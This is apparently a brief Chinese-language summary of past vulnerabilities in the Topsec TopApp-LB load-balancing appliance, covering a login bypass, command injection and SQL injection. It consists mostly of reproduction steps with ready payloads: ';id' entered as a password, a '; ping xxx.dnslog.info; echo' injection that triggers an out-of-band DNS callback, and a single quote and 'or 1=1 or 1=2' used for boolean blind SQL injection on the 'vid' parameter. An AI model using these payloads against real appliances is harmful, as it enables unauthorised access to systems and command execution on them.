天融信TopApp-LB 負載均衡系統漏洞總結(曆史漏洞)
一、漏洞描述
1、天融信負載均衡TopApp-LB系統無需密碼直接登陸
2、天融信TopApp-LB負載均衡指令執行漏洞
3、天融信TopApp-LB 負載均衡系統Sql注入漏洞
二、漏洞複現
1、使用poc::使用者名随意 密碼:;id
2、使用poc:; ping xxx.dnslog.info; echo
3.1、抓包
3.2、vid參數加單引号,報錯
3.3、使用or 1=1 or 1=2發現傳回界面不一樣,證明存在注入點(布爾盲注)